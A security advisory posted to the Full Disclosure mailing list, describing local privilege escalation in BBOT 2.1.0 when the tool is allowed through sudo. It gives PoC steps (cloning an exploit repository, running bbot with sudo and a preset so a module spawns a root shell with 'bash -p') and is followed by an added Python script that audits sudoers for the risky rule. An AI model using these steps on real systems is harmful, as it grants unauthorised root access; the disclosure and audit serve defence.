BBOT 2.1.0 - Local Privilege Escalation via Malicious Module Execution
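This article describes a local privilege escalation vulnerability in BBOT 2.1.0: when BBOT is configured as sudo-executable, a malicious module can gain elevated privileges through its `setup()` function. The issue relies on BBOT's ability to execute custom Python modules and allows privilege escalation under specific conditions. 2025-4-24 03:14:16 Author: seclists.org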


Full Disclosure mailing list archives


From: Housma mardini <housma () gmail com>
Date: Fri, 18 Apr 2025 16:12:49 +0400

Hi Full Disclosure,

I'd like to share a local privilege escalation technique involving BBOT
(Bighuge BLS OSINT Tool) when misconfigured with sudo access.

---

Exploit Title: BBOT 2.1.0 - Local Privilege Escalation via Malicious Module
Execution
Date: 2025-04-16
Exploit Author: Huseyin Mardinli
Vendor Homepage: https://github.com/blacklanternsecurity/bbot
Version: 2.1.0.4939rc (tested)
Tested on: Kali Linux Rolling (2025.1)
CVE: N/A
Platform: Linux
Type: Local

### Description:

BBOT allows execution of custom Python modules during OSINT scans. When
configured as a sudo-executable (e.g., via NOPASSWD), a malicious module
can escalate privileges via the `setup()` function.

### PoC Steps:

1. Clone:
   git clone https://github.com/Housma/bbot-privesc.git

2. Run with sudo:
   sudo /usr/local/bin/bbot -t dummy.com -p preset.yml --event-types ROOT

3. A root shell is spawned via `bash -p` from within the module.

### GitHub (Full Write-up + PoC):
https://github.com/Housma/bbot-privesc

---

This exploit highlights how trusted open-source tools can be abused in
real-world environments.

Regards,
Huseyin Mardinli
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/
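
An added example (not part of the original post or of the BBOT project): a defender-side audit for the precondition the advisory names, a sudoers rule that lets a user run `bbot` as root with caller-chosen arguments such as `-p preset.yml`. The sample sudoers text, the `CODE_LOADING_TOOLS` set and the function names are constructed for illustration.

```python
import re

# Constructed sample sudoers text (not from the original post).
SAMPLE = r"""
# constructed sample
Cmnd_Alias OSINT = /usr/local/bin/bbot, \
                   /usr/bin/nmap -sn *
alice  ALL=(ALL) NOPASSWD: OSINT
bob    ALL=(root) /usr/local/bin/bbot --version
%ops   ALL=(ALL:ALL) NOPASSWD: /usr/bin/systemctl restart nginx
"""

# Assumption: basenames of tools that load caller-chosen code when run.
CODE_LOADING_TOOLS = {"bbot"}

def logical_lines(text):
    """Join backslash continuations; drop comments and blank lines.
    '#include' directives are treated as comments and not followed."""
    for line in re.sub(r"\\\n\s*", " ", text).splitlines():
        line = line.split("#", 1)[0].strip()
        if line:
            yield line

def audit(text):
    """Return (who, command, nopasswd, args_unrestricted) per matching rule."""
    lines = list(logical_lines(text))
    aliases = {}
    for line in lines:  # first pass: collect Cmnd_Alias definitions
        m = re.match(r"Cmnd_Alias\s+(\w+)\s*=\s*(.+)", line)
        if m:
            aliases[m.group(1)] = [c.strip() for c in m.group(2).split(",")]
    findings = []
    for line in lines:  # second pass: user specifications
        m = re.match(r"(\S+)\s+[^\s=]+\s*=\s*(.+)", line)
        if re.match(r"(Defaults|\w+_Alias)\b", line) or not m:
            continue
        who, nopasswd = m.group(1), False
        spec = re.sub(r"\([^)]*\)", "", m.group(2))  # drop (runas) lists
        for item in spec.split(","):
            # Tags such as NOPASSWD: apply to this and later commands.
            while (tag := re.match(r"\s*([A-Z_]+):\s*", item)):
                nopasswd = {"NOPASSWD": True, "PASSWD": False}.get(tag.group(1), nopasswd)
                item = item[tag.end():]
            for cmd in aliases.get(item.strip(), [item.strip()]):
                parts = cmd.split()
                if parts and parts[0].rsplit("/", 1)[-1] in CODE_LOADING_TOOLS:
                    # No argument list in sudoers means any arguments are allowed.
                    open_args = len(parts) == 1 or any("*" in p for p in parts[1:])
                    findings.append((who, cmd, nopasswd, open_args))
    return findings

if __name__ == "__main__":
    for who, cmd, nopasswd, open_args in audit(SAMPLE):
        print(f"{who}: {cmd} nopasswd={nopasswd} caller_controls_args={open_args}")
```

Rules reported with unrestricted arguments are the ones to remove or pin to a fixed argument list; on a live host the input would be the contents of `/etc/sudoers` and `/etc/sudoers.d/*`.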



Source: https://seclists.org/fulldisclosure/2025/Apr/19